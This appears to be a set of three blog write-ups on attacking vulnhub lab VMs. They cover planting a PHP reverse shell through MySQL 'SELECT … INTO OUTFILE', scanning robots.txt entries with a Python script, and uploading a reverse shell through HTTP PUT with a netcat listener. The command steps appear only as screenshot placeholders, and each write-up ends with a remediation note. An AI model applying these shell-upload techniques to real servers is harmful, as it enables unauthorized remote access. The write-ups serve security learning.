Shell upload through MySQL statement

Today, I will talk about how import a shell through a MySQL syntax.

Introduction

MySQL is an open-source relational database management system (RDBMS). Its name is a combination of “My”, the name of co-founder Michael Widenius’s daughter, and “SQL”, the abbreviation for Structured Query Language.

So MySQL is a database service, like mariaDB (fork from MSQL) or SQL Server.

In the context, I was exploiting a vulnerable VM,  Stapler 1 from  vulnhub. I had access to the mySQL service and I was wondering how import a shell file on the server, in order to later be connected on.

Topology

topo.png

Exploitation

Therefore I have access on the mysql service remotely using password “plbkac”:

Capture.PNG

Then I list the databases available:

Capture.PNG

A lot DBs are stored on the server. I will upload a shell on the server. First I generate the payload using msfvenom , don’t forget to place as LHOST the computer the server will connect back (the attack machine).

Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.

Capture.PNG

To have a look at the file:

Capture.PNG

To resume: msfvenom has created a reverse TCP shell in PHP and encoded in base64. Once executed, the shell’s host will initiates a TCP connection toward the IP 192.168.0.5 on the port 4444.

Now I will upload the shell to the server using a SQL syntax:

Capture.PNG

To be sure the request operates, I check the website:

fire

Remote reverse TCP shell well upload through this PHP file !

Now I will use the multi handler. The multi handler just starts the payload receiver and waits for a connection or connects out.

Capture.PNG

I specify my IP and the port : 192.168.0.5:4444. These are the information I have set when configuring the original payload.

I will request the infected web page using -k making the connection as “insecure” by default, no certificate verification. I request…

Capture.PNG

… and I got a remote shell on the server :

Capture.PNG

Remediation

The statement “SELECT … INTO OUTFILE” should be block by default for non-privilege database users.

Conclusion

This is a way to gain a remote access to a server using a MySQL statement.

The msfvenom and multi/handler are just a way to get the reverse TCP shell.

Robots.txt entries checker

Today, I will talk about the vulnerability from the robots.txt file.

Introduction

From the Moz website, here the description of what is the purpose of the file robots.txt:

“Robots.txt is a text file webmasters create to instruct web robots (typically search engine robots) how to crawl pages on their website. The robots.txt file is part of the the robots exclusion protocol (REP), a group of web standards that regulate how robots crawl the web, access and index content, and serve that content up to users.

In practice, robots.txt files indicate whether certain user agents (web-crawling software) can or cannot crawl parts of a website. These crawl instructions are specified by “disallowing” or “allowing” the behavior of certain (or all) user agents.”

In the context, I was exploitating a vulnerable the SkyDog 1 VM from vulnhub . As I always do first, I check if a robots.txt file was on the webserver.

Hopefully, there was one, but there was thousands of entries. I can’t check them one by one, so I script.

Topology

topo - Copie.png

Exploitation

As I said, the robots.txt file had thousand of entries !

I download the file:

Capture.PNG

I will check the file, the beginning and the end:

Capture.PNG

I check how many entries there are:

Capture.PNG

Around three hundreds entries to check ! I have to script… I do using python language:

#################################################################
#Objective: 
# Check robots.txt
#Description: 
# Test each entries in robots.txt
#Date:
# 02/08/2018
#################################################################

import requests

#clean the robots.txt file
#delete Allow and Disallow directive
infile = "robots.txt"
outfile = "cleaned_file.txt"

delete_list = ["Disallow: /", "Allow: /"]
fin = open(infile)
fout = open(outfile, "w+")

print("cleaning file...")
for line in fin:
    for word in delete_list:
        line = line.replace(word, "")
    fout.write(line)
fin.close()
fout.close()

cleanfile = "cleaned_file.txt"
fclean = open(cleanfile)

match='404 Not Found'

for entries in fclean:
        entries = entries.rstrip("\n")
        url = "http://192.168.0.7/%s" % entries
        request = requests.get(url).text
        if match not in request:
                print("UP: "+url)

Then I execute the script:

Capture.PNG

Only the last URL drives to a great hint. The others are kind of false positives that display the webserver homepage.

setec

And finaly by looking at the source code, I go on the pentest to the directory Astronomy which had a directory listing available:

Sans titre.png

Remediation

Don’t include the most sensitive part of your website in your robots.txt file. The web crawlers are usefull when indexing the website marketing/commercial page, not the sensitive.

Conclusion

The robots.txt file consists sometimes the first hint to sensitive folder and document on a webserver. Looking for it may be the first step during a pentest on a web application exposed on Internet.

If you have any question, I will be glad to answer you back 🙂

Also have my twitter account, gr3g0v1tch !

HTTP PUT

Today, I will talk about the vulnerability HTTP PUT.

Table of contents:

  1. Introduction
  2. Topology
  3. Detection
  4. Attack
  5. Remediation
  6. Conclusion

Introduction

From the MDN webdocs, here the description of HTTP verb PUT : “The HTTP PUT request method creates a new resource or replaces a representation of the target resource with the request payload.”

In the context, I was exploitating a vulnerable the SickOS v1.2 VM from vulnhub . After discovering that a directory listing was available, I want to know more about the page.

Topology

topo.png

Detection

To find out which request methods a server supports, one can use curl and issue an OPTIONS request:

Capture.PNG

The HTTP PUT method is used sometimes in REST API. As I knew that HTTP PUT is permitted, I try upload a simple php file to the server. Here the content of the file:

Capture.PNG

Attack

I try sending it:

Capture.PNG

The command return seems, let’s inspect the web page:

Capture.PNG

And if I try executing it :

Capture.PNG

So the PHP is well executed on the server. Now I will upload a reverse TCP shell from pentestmonkey to have a remote connection on the server. I set my own IP and the port I want to be reach on. I choose 443 because I could be seen as a “trusted” port to be connected on from the target server firewall:

Capture.PNG

This time, I will upload the file using a nmap script instead of curl:

Capture

I wait for a connection on the target port:

Capture.PNG

If I hit the file just uploaded by making a http request…

Capture.PNG

… I gain a remote access with nc. The nc (or netcat) utility is used for just about anything under the sun involving TCP or UDP, -l for listening mode -p for port number and -n for numeric, no DNS.

Capture.PNG

Then post exploitation can be done in order to be root on the server but that was not the point here !

Remediation

On the developer side, implements a blacklist from the extension allowed to be upload or disallow HTTP PUT method to be used.

Conclusion

This is vulnerability that can easily be checked on a web page.

If you have any question, I will be glad to answer you back 🙂

Also have my twitter account, gr3g0v1tch !